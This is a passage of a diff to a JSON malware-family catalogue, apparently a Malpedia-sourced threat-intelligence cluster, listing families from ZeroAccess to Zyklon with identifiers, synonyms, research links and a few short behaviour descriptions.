+ "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html",
+ "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/",
+ "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/",
+ "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/",
+ "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/",
+ "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html"
+ ]
+ },
+ "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7",
+ "value": "ZeroAccess",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil",
+ "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/",
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil"
+ ]
+ },
+ "uuid": "585f9f75-1239-4561-8815-c5ae033053a1",
+ "value": "ZeroEvil",
+ "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. 
Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n"
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot",
+ "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+ ]
+ },
+ "uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c",
+ "value": "ZeroT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Zbot"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus",
+ "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html",
+ "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html",
+ "https://www.secureworks.com/research/zeus?threat=zeus",
+ "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20",
+ "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf",
+ "https://nakedsecurity.sophos.com/2010/07/24/sample-run/",
+ "http://eternal-todo.com/blog/zeus-spreading-facebook",
+ "http://eternal-todo.com/blog/new-zeus-binary",
+ "http://eternal-todo.com/blog/detecting-zeus",
+ "https://www.mnin.org/write/ZeusMalware.pdf",
+ "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html",
+ "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html",
+ "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html",
+ "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html",
+ "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html",
+ "https://zeustracker.abuse.ch/monitor.php",
+ "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html"
+ ]
+ },
+ "uuid": 
"4e8c1ab7-2841-4823-a5d1-39284fb0969a",
+ "value": "Zeus",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer"
+ ]
+ },
+ "uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3",
+ "value": "Zeus MailSniffer",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx",
+ "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/",
+ "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/",
+ "https://securityintelligence.com/uk-banks-hit-with-new-zeus-sphinx-variant-and-renewed-kronos-banking-trojan-attacks/"
+ ]
+ },
+ "uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4",
+ "value": "Zeus Sphinx",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_ssl"
+ ]
+ },
+ "uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0",
+ "value": "Zeus SSL",
+ "description": "The sample listed here was previously mislabeled and is now integrated into win.floki_bot. The family is to-be-updated once we have a \"real\" Zeus SSL sample."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin",
+ "https://twitter.com/siri_urz/status/923479126656323584",
+ "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877"
+ ]
+ },
+ "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f",
+ "value": "Zezin",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat",
+ "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ ]
+ },
+ "uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614",
+ "value": "ZhCat",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhmimikatz",
+ "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ ]
+ },
+ "uuid": "989330e9-52da-4489-888b-686429db3a45",
+ "value": "ZhMimikatz",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Zeus Terdot"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader",
+ "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/",
+ "https://labs.bitdefender.com/2017/11/terdot-zeus-based-malware-strikes-back-with-a-blast-from-the-past/",
+ "https://www.arbornetworks.com/blog/asert/great-dga-sphinx/"
+ ]
+ },
+ "uuid": "13236f94-802b-4abc-aaa9-cb80cf4df9ed",
+ "value": "Zloader",
+ "description": "A banking trojan first observed in October 2016 has grown into a sophisticated hacking tool that works primarily as a banking trojan, but could also be used as an infostealer or backdoor."
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "gresim"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zoxpng",
+ "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf"
+ ]
+ },
+ "uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7",
+ "value": "ZoxPNG",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Sensocode"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell",
+ "https://blogs.cisco.com/security/talos/opening-zxshell",
+ "https://blogs.rsa.com/cat-phishing/",
+ "https://github.com/smb01/zxshell"
+ ]
+ },
+ "uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15",
+ "value": "ZXShell",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon",
+ "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html"
+ ]
+ },
+ "uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722",
+ "value": "Zyklon",
+ "description": ""
+ }
+ ],
+ "version": 1649,
+ "source": "Malpedia",
+ "name": "Malpedia",
+ "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e"
 }